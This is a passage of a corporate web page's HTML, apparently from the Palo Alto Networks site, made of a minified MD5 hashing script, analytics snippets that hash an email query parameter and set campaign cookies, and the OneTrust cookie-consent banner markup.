r,i;while(++n<e.length){r=e.charCodeAt(n);i=n+1<e.length?e.charCodeAt(n+1):0;if(55296<=r&&r<=56319&&56320<=i&&i<=57343){r=65536+((r&1023)<<10)+(i&1023);n++}if(r<=127)t+=String.fromCharCode(r);else if(r<=2047)t+=String.fromCharCode(192|r>>>6&31,128|r&63);else if(r<=65535)t+=String.fromCharCode(224|r>>>12&15,128|r>>>6&63,128|r&63);else if(r<=2097151)t+=String.fromCharCode(240|r>>>18&7,128|r>>>12&63,128|r>>>6&63,128|r&63)}return t}function m(e){var t="";for(var n=0;n<e.length;n++)t+=String.fromCharCode(e.charCodeAt(n)&255,e.charCodeAt(n)>>>8&255);return t}function g(e){var t="";for(var n=0;n<e.length;n++)t+=String.fromCharCode(e.charCodeAt(n)>>>8&255,e.charCodeAt(n)&255);return t}function y(e){var t=Array(e.length>>2);for(var n=0;n<t.length;n++)t[n]=0;for(var n=0;n<e.length*8;n+=8)t[n>>5]|=(e.charCodeAt(n/8)&255)<<n%32;return t}function b(e){var t="";for(var n=0;n<e.length*32;n+=8)t+=String.fromCharCode(e[n>>5]>>>n%32&255);return t}function w(e,t){e[t>>5]|=128<<t%32;e[(t+64>>>9<<4)+14]=t;var n=1732584193;var r=-271733879;var i=-1732584194;var s=271733878;for(var o=0;o<e.length;o+=16){var u=n;var a=r;var f=i;var l=s;n=S(n,r,i,s,e[o+0],7,-680876936);s=S(s,n,r,i,e[o+1],12,-389564586);i=S(i,s,n,r,e[o+2],17,606105819);r=S(r,i,s,n,e[o+3],22,-1044525330);n=S(n,r,i,s,e[o+4],7,-176418897);s=S(s,n,r,i,e[o+5],12,1200080426);i=S(i,s,n,r,e[o+6],17,-1473231341);r=S(r,i,s,n,e[o+7],22,-45705983);n=S(n,r,i,s,e[o+8],7,1770035416);s=S(s,n,r,i,e[o+9],12,-1958414417);i=S(i,s,n,r,e[o+10],17,-42063);r=S(r,i,s,n,e[o+11],22,-1990404162);n=S(n,r,i,s,e[o+12],7,1804603682);s=S(s,n,r,i,e[o+13],12,-40341101);i=S(i,s,n,r,e[o+14],17,-1502002290);r=S(r,i,s,n,e[o+15],22,1236535329);n=x(n,r,i,s,e[o+1],5,-165796510);s=x(s,n,r,i,e[o+6],9,-1069501632);i=x(i,s,n,r,e[o+11],14,643717713);r=x(r,i,s,n,e[o+0],20,-373897302);n=x(n,r,i,s,e[o+5],5,-701558691);s=x(s,n,r,i,e[o+10],9,38016083);i=x(i,s,n,r,e[o+15],14,-660478335);r=x(r,i,s,n,e[o+4],20,-405537848);n=x(n,r,i,s,e[o+9],5,568446438);s=x(s,n,r,i,e[o+14],9,-1019803690);i=x(i,s,n,r,e[o+3],14,-187363961);r=x(r,i,s,n,e[o+8],20,1163531501);n=x(n,r,i,s,e[o+13],5,-1444681467);s=x(s,n,r,i,e[o+2],9,-51403784);i=x(i,s,n,r,e[o+7],14,1735328473);r=x(r,i,s,n,e[o+12],20,-1926607734);n=T(n,r,i,s,e[o+5],4,-378558);s=T(s,n,r,i,e[o+8],11,-2022574463);i=T(i,s,n,r,e[o+11],16,1839030562);r=T(r,i,s,n,e[o+14],23,-35309556);n=T(n,r,i,s,e[o+1],4,-1530992060);s=T(s,n,r,i,e[o+4],11,1272893353);i=T(i,s,n,r,e[o+7],16,-155497632);r=T(r,i,s,n,e[o+10],23,-1094730640);n=T(n,r,i,s,e[o+13],4,681279174);s=T(s,n,r,i,e[o+0],11,-358537222);i=T(i,s,n,r,e[o+3],16,-722521979);r=T(r,i,s,n,e[o+6],23,76029189);n=T(n,r,i,s,e[o+9],4,-640364487);s=T(s,n,r,i,e[o+12],11,-421815835);i=T(i,s,n,r,e[o+15],16,530742520);r=T(r,i,s,n,e[o+2],23,-995338651);n=N(n,r,i,s,e[o+0],6,-198630844);s=N(s,n,r,i,e[o+7],10,1126891415);i=N(i,s,n,r,e[o+14],15,-1416354905);r=N(r,i,s,n,e[o+5],21,-57434055);n=N(n,r,i,s,e[o+12],6,1700485571);s=N(s,n,r,i,e[o+3],10,-1894986606);i=N(i,s,n,r,e[o+10],15,-1051523);r=N(r,i,s,n,e[o+1],21,-2054922799);n=N(n,r,i,s,e[o+8],6,1873313359);s=N(s,n,r,i,e[o+15],10,-30611744);i=N(i,s,n,r,e[o+6],15,-1560198380);r=N(r,i,s,n,e[o+13],21,1309151649);n=N(n,r,i,s,e[o+4],6,-145523070);s=N(s,n,r,i,e[o+11],10,-1120210379);i=N(i,s,n,r,e[o+2],15,718787259);r=N(r,i,s,n,e[o+9],21,-343485551);n=C(n,u);r=C(r,a);i=C(i,f);s=C(s,l)}return Array(n,r,i,s)}function E(e,t,n,r,i,s){return C(k(C(C(t,e),C(r,s)),i),n)}function S(e,t,n,r,i,s,o){return E(t&n|~t&r,e,t,i,s,o)}function x(e,t,n,r,i,s,o){return E(t&r|n&~r,e,t,i,s,o)}function T(e,t,n,r,i,s,o){return E(t^n^r,e,t,i,s,o)}function N(e,t,n,r,i,s,o){return E(n^(t|~r),e,t,i,s,o)}function C(e,t){var n=(e&65535)+(t&65535);var r=(e>>16)+(t>>16)+(n>>16);return r<<16|n&65535}function k(e,t){return e<<t|e>>>32-t}var t=0;var n="";e.encrypt={};e.encrypt.hex_md5=r;e.encrypt.b64_md5=i;e.encrypt.any_md5=s})(window.crypto);

  window.crypto.getParameterByName = function(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, "\\$&");
      var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, " "));
  }
}
if(window.crypto.getParameterByName){
  var email = window.crypto.getParameterByName('Email');
  if(email){
    window.webData.eMail = email;
    window.webData.eMailHash = window.crypto.encrypt.hex_md5(email);
  }
} else {
	console.log('Not Loading');
}
});</script><script>_satellite["_runScript2"](function(event, target, Promise) {
var campaignName = _satellite.getVar('AT_Cookie_Campaign_Name');
if(typeof ttMETA != "undefined"){
  if(ttMETA[0].CampaignName == campaignName){
    if(_satellite.cookie.get('nav_target_exp_cmpName')==campaignName){
      //Do Nothing
    }else{
      _satellite.cookie.set('nav_target_exp_cmpName', campaignName, {expires: 30});
      _satellite.cookie.set('nav_target_exp', ttMETA[0].RecipeName, {expires: 30});
    } 
  }
}
});</script><div id="onetrust-consent-sdk" data-nosnippet="true"><div class="onetrust-pc-dark-filter ot-hide ot-fade-in"></div><div id="onetrust-banner-sdk" class="otFlat bottom ot-wo-title vertical-align-content" role="region" aria-label="Cookie banner"><div role="dialog" aria-label="Privacy"><div class="ot-sdk-container"><div class="ot-sdk-row"><div id="onetrust-group-container" class="ot-sdk-eight ot-sdk-columns"><div class="banner_logo"></div><div id="onetrust-policy"><div id="onetrust-policy-text">This site uses cookies essential to its operation, for analytics, and for personalized content and ads. Please read our privacy statement for more information.<a class="ot-cookie-policy-link" href="https://www.paloaltonetworks.com/legal-notices/privacy" aria-label="Privacy statement, opens in a new tab" rel="noopener">Privacy statement</a></div></div></div><div id="onetrust-button-group-parent" class="ot-sdk-three ot-sdk-columns has-reject-all-button"><div id="onetrust-button-group"><button id="onetrust-pc-btn-handler">Cookies Settings</button> <button id="onetrust-reject-all-handler">Reject All</button> <button id="onetrust-accept-btn-handler">Accept All</button></div></div></div></div><!-- Close Button --><div id="onetrust-close-btn-container"><button class="onetrust-close-btn-handler onetrust-close-btn-ui banner-close-button ot-close-icon" style="background-image: url(&quot;https://cdn.cookielaw.org/logos/static/ot_close.svg&quot;);" aria-label="Close"></button></div><!-- Close Button END--></div></div><div id="onetrust-pc-sdk" class="otPcCenter ot-hide ot-fade-in" lang="en" aria-label="Preference center" role="region"><div role="dialog" aria-modal="true" style="height: 100%;" aria-label="Privacy Preference Center"><!-- Close Button --><div class="ot-pc-header"><!-- Logo Tag --><div class="ot-pc-logo" role="img" aria-label="Company Logo"><img alt="Company Logo" src="https://cdn.cookielaw.org/logos/17444fe5-d1b7-4e74-91f7-54412bafd309/c96e4f44-29f1-4037-b8db-8926e9558ce1/fbdfdc34-f2b3-41d8-936a-a34060d48bd6/PANW_Parent_Brand_Primary_Logo_RGB_Red_White.png"></div><button id="close-pc-btn-handler" class="ot-close-icon" aria-label="Close" style="background-image: url(&quot;https://cdn.cookielaw.org/logos/static/ot_close.svg&quot;);"></button></div><!-- Close Button --><div id="ot-pc-content" class="ot-pc-scrollbar"><div class="ot-optout-signal ot-hide"><div class="ot-optout-icon"><svg xmlns="http://www.w3.org/2000/svg"><path class="ot-floating-button__svg-fill" d="M14.588 0l.445.328c1.807 1.303 3.961 2.533 6.461 3.688 2.015.93 4.576 1.746 7.682 2.446 0 14.178-4.73 24.133-14.19 29.864l-.398.236C4.863 30.87 0 20.837 0 6.462c3.107-.7 5.668-1.516 7.682-2.446 2.709-1.251 5.01-2.59 6.906-4.016zm5.87 13.88a.75.75 0 00-.974.159l-5.475 6.625-3.005-2.997-.077-.067a.75.75 0 00-.983 1.13l4.172 4.16 6.525-7.895.06-.083a.75.75 0 00-.16-.973z" fill="#FFF" fill-rule="evenodd"></path></svg></div><span>Your Opt Out Preference Signal is Honored</span></div><h2 id="ot-pc-title">Privacy Preference Center</h2><div id="ot-pc-desc">When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer.
            <br><a href="https://www.paloaltonetworks.com/legal-notices/privacy" class="privacy-notice-link" rel="noopener" aria-label="More information about your privacy, opens in a new tab">More information on cookie consent</a></div><button id="accept-recommended-btn-handler">Allow All</button><section class="ot-sdk-row ot-cat-grp"><h3 id="ot-category-title"> Manage Your Consent Preferences</h3><div class="ot-accordion-layout ot-cat-item ot-vs-config" data-optanongroupid="C0001"><button aria-expanded="false" ot-accordion="true" aria-controls="ot-desc-id-C0001" aria-labelledby="ot-header-id-C0001 ot-status-id-C0001"></button><!-- Accordion header --><div class="ot-acc-hdr ot-always-active-group"><div class="ot-plus-minus"><span></span><span></span></div><h4 class="ot-cat-header" id="ot-header-id-C0001">Strictly Necessary Cookies</h4><div id="ot-status-id-C0001" class="ot-always-active">Always Active</div></div><!-- accordion detail --><div class="ot-acc-grpcntr ot-acc-txt"><p class="ot-acc-grpdesc ot-category-desc" id="ot-desc-id-C0001">These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. &nbsp; &nbsp;You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information.</p></div></div><div class="ot-accordion-layout ot-cat-item ot-vs-config" data-optanongroupid="C0002"><button aria-expanded="false" ot-accordion="true" aria-controls="ot-desc-id-C0002" aria-labelledby="ot-header-id-C0002"></button><!-- Accordion header --><div class="ot-acc-hdr"><div class="ot-plus-minus"><span></span><span></span></div><h4 class="ot-cat-header" id="ot-header-id-C0002">Performance Cookies</h4><div class="ot-tgl"><input type="checkbox" name="ot-group-id-C0002" id="ot-group-id-C0002" role="switch" class="category-switch-handler" data-optanongroupid="C0002" aria-labelledby="ot-header-id-C0002"> <label class="ot-switch" for="ot-group-id-C0002"><span class="ot-switch-nob"></span> <span class="ot-label-txt">Performance Cookies</span></label> </div></div><!-- accordion detail --><div class="ot-acc-grpcntr ot-acc-txt"><p class="ot-acc-grpdesc ot-category-desc" id="ot-desc-id-C0002">These cookies allow us to count visits and traffic sources so we can measure and improve the performance of our site. They help us to know which pages are the most and least popular and see how visitors move around the site. &nbsp; &nbsp;All information these cookies collect is aggregated and therefore anonymous. If you do not allow these cookies we will not know when you have visited our site, and will not be able to monitor its performance.</p></div></div><div class="ot-accordion-layout ot-cat-item ot-vs-config" data-optanongroupid="C0003"><button aria-expanded="false" ot-accordion="true" aria-controls="ot-desc-id-C0003" aria-labelledby="ot-header-id-C0003"></button><!-- Accordion header --><div class="ot-acc-hdr"><div class="ot-plus-minus"><span></span><span></span></div><h4 class="ot-cat-header" id="ot-header-id-C0003">Functional Cookies</h4><div class="ot-tgl"><input type="checkbox" name="ot-group-id-C0003" id="ot-group-id-C0003" role="switch" class="category-switch-handler" data-optanongroupid="C0003" aria-labelledby="ot-header-id-C0003"> <label class="ot-switch" for="ot-group-id-C0003"><span class="ot-switch-nob"></span> <span class="ot-label-txt">Functional Cookies</span></label> </div></div><!-- accordion detail --><div class="ot-acc-grpcntr ot-acc-txt"><p class="ot-acc-grpdesc ot-category-desc" id="ot-desc-id-C0003">These cookies enable the website to provide enhanced functionality and personalisation. They may be set by us or by third party providers whose services we have added to our pages. &nbsp; &nbsp;If you do not allow these cookies then some or all of these services may not function properly.</p></div></div><div class="ot-accordion-layout ot-cat-item ot-vs-config" data-optanongroupid="C0004"><button aria-expanded="false" ot-accordion="true" aria-controls="ot-desc-id-C0004" aria-labelledby="ot-header-id-C0004"></button><!-- Accordion header --><div class="ot-acc-hdr"><div class="ot-plus-minus"><span></span><span></span></div><h4 class="ot-cat-header" id="ot-header-id-C0004">Targeting Cookies</h4><div class="ot-tgl"><input type="checkbox" name="ot-group-id-C0004" id="ot-group-id-C0004" role="switch" class="category-switch-handler" data-optanongroupid="C0004" aria-labelledby="ot-header-id-C0004"> <label class="ot-switch" for="ot-group-id-C0004"><span class="ot-switch-nob"></span> <span class="ot-label-txt">Targeting Cookies</span></label> </div></div><!-- accordion detail --><div class="ot-acc-grpcntr ot-acc-txt"><p class="ot-acc-grpdesc ot-category-desc" id="ot-desc-id-C0004">These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. &nbsp; &nbsp;They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising.</p></div></div><!-- Groups sections starts --><!-- Group section ends --><!-- Accordion Group section starts --><!-- Accordion Group section ends --></section></div><section id="ot-pc-lst" class="ot-hide ot-hosts-ui ot-pc-scrollbar"><div id="ot-pc-hdr"><div id="ot-lst-title"><button class="ot-link-btn back-btn-handler" aria-label="Back"><svg id="ot-back-arw" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 444.531 444.531" xml:space="preserve"><title>Back Button</title><g><path fill="#656565" d="M213.13,222.409L351.88,83.653c7.05-7.043,10.567-15.657,10.567-25.841c0-10.183-3.518-18.793-10.567-25.835
                    l-21.409-21.416C323.432,3.521,314.817,0,304.637,0s-18.791,3.521-25.841,10.561L92.649,196.425
                    c-7.044,7.043-10.566,15.656-10.566,25.841s3.521,18.791,10.566,25.837l186.146,185.864c7.05,7.043,15.66,10.564,25.841,10.564
                    s18.795-3.521,25.834-10.564l21.409-21.412c7.05-7.039,10.567-15.604,10.567-25.697c0-10.085-3.518-18.746-10.567-25.978
                    L213.13,222.409z"></path></g></svg></button><h3>Cookie List</h3></div><div class="ot-lst-subhdr"><div class="ot-search-cntr"><p role="status" class="ot-scrn-rdr"></p><input id="vendor-search-handler" type="text" name="vendor-search-handler" placeholder="Search…" aria-label="Cookie list search"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 -30 110 110" aria-hidden="true"><title>Search Icon</title><path fill="#2e3644" d="M55.146,51.887L41.588,37.786c3.486-4.144,5.396-9.358,5.396-14.786c0-12.682-10.318-23-23-23s-23,10.318-23,23
            s10.318,23,23,23c4.761,0,9.298-1.436,13.177-4.162l13.661,14.208c0.571,0.593,1.339,0.92,2.162,0.92
            c0.779,0,1.518-0.297,2.079-0.837C56.255,54.982,56.293,53.08,55.146,51.887z M23.984,6c9.374,0,17,7.626,17,17s-7.626,17-17,17
            s-17-7.626-17-17S14.61,6,23.984,6z"></path></svg></div><div class="ot-fltr-cntr"><button id="filter-btn-handler" aria-label="Filter" aria-haspopup="true"><svg role="presentation" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 402.577 402.577" xml:space="preserve"><title>Filter Icon</title><g><path fill="#fff" d="M400.858,11.427c-3.241-7.421-8.85-11.132-16.854-11.136H18.564c-7.993,0-13.61,3.715-16.846,11.136
      c-3.234,7.801-1.903,14.467,3.999,19.985l140.757,140.753v138.755c0,4.955,1.809,9.232,5.424,12.854l73.085,73.083
      c3.429,3.614,7.71,5.428,12.851,5.428c2.282,0,4.66-0.479,7.135-1.43c7.426-3.238,11.14-8.851,11.14-16.845V172.166L396.861,31.413
      C402.765,25.895,404.093,19.231,400.858,11.427z"></path></g></svg></button></div><div id="ot-anchor"></div><section id="ot-fltr-modal"><div id="ot-fltr-cnt"><button id="clear-filters-handler">Clear</button><div class="ot-fltr-scrlcnt ot-pc-scrollbar"><div class="ot-fltr-opts"><div class="ot-fltr-opt"><div class="ot-chkbox"><input id="chkbox-id" type="checkbox" class="category-filter-handler"> <label for="chkbox-id"><span class="ot-label-txt">checkbox label</span></label> <span class="ot-label-status">label</span></div></div></div><div class="ot-fltr-btns"><button id="filter-apply-handler">Apply</button> <button id="filter-cancel-handler">Cancel</button></div></div></div></section></div></div><section id="ot-lst-cnt" class="ot-host-cnt ot-pc-scrollbar"><div id="ot-sel-blk"><div class="ot-sel-all"><div class="ot-sel-all-hdr"><span class="ot-consent-hdr">Consent</span> <span class="ot-li-hdr">Leg.Interest</span></div><div class="ot-sel-all-chkbox"><div class="ot-chkbox" id="ot-selall-hostcntr"><input id="select-all-hosts-groups-handler" type="checkbox"> <label for="select-all-hosts-groups-handler"><span class="ot-label-txt">checkbox label</span></label> <span class="ot-label-status">label</span></div><div class="ot-chkbox" id="ot-selall-vencntr"><input id="select-all-vendor-groups-handler" type="checkbox"> <label for="select-all-vendor-groups-handler"><span class="ot-label-txt">checkbox label</span></label> <span class="ot-label-status">label</span></div><div class="ot-chkbox" id="ot-selall-licntr"><input id="select-all-vendor-leg-handler" type="checkbox"> <label for="select-all-vendor-leg-handler"><span class="ot-label-txt">checkbox label</span></label> <span class="ot-label-status">label</span></div></div></div></div><div class="ot-sdk-row"><div class="ot-sdk-column"></div></div></section></section><div class="ot-pc-footer ot-pc-scrollbar"><div class="ot-btn-container"><button class="ot-pc-refuse-all-handler">Reject All</button> <button class="save-preference-btn-handler onetrust-close-btn-handler">Confirm My Choices</button></div><!-- Footer logo --><div class="ot-pc-footer-logo"><a href="https://www.onetrust.com/products/cookie-consent/" target="_blank" rel="noopener noreferrer" aria-label="Powered by OneTrust Opens in a new Tab"><img alt="Powered by Onetrust" src="https://cdn.cookielaw.org/logos/static/powered_by_logo.svg" title="Powered by OneTrust Opens in a new Tab"></a></div></div><!-- Cookie subgroup container --><!-- Vendor list link --><!-- Cookie lost link --><!-- Toggle HTML element --><!-- Checkbox HTML --><!-- plus minus--><!-- Arrow SVG element --><!-- Accordion basic element --><span class="ot-scrn-rdr" aria-atomic="true" aria-live="polite"></span><!-- Vendor Service container and item template --></div><iframe class="ot-text-resize" sandbox="allow-same-origin" title="onetrust-text-resize" style="position: absolute; top: -50000px; width: 100em;" aria-hidden="true"></iframe></div></div></body></html>